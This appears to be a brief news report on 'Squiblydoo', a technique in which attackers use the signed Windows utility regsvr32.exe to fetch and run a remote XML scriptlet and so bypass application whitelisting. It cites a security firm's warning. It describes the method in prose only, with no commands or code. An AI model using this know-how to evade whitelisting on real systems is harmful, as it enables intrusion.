Native OS tools, living off the land… it’s all very crunchy
Hackers have figured out how to bypass application whitelisting software by utilising tools that are built into Windows by default.
Squiblydoo allows a user with normal privileges to download and execute a script hosted on a remote server.
All of this is done with signed Microsoft binaries that are installed with the operating system.
The technique offers a mechanism for hackers to run unapproved scripts on systems set up to block such software and only supposed to all kosher code to run, as explained in more detail in a blog post by security firm Carbon Black (extract below).
Squiblydoo utilizes the binary regsvr32.exe (a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry) to download an XML file that contains scriptlets for executing code on the victim machine… Attackers can utilize ActiveX and embed custom VB or JS in the XML file to carry out any type of attacks.
Carbon Black warns that Squiblydoo is geared towards evading detection and blocking mechanisms.
The techniques evident in Squiblydoo continues a trend of attackers using native OS tools to conduct attacks, previously seen with malware written in PowerShell, it adds. ®
Rise of the machines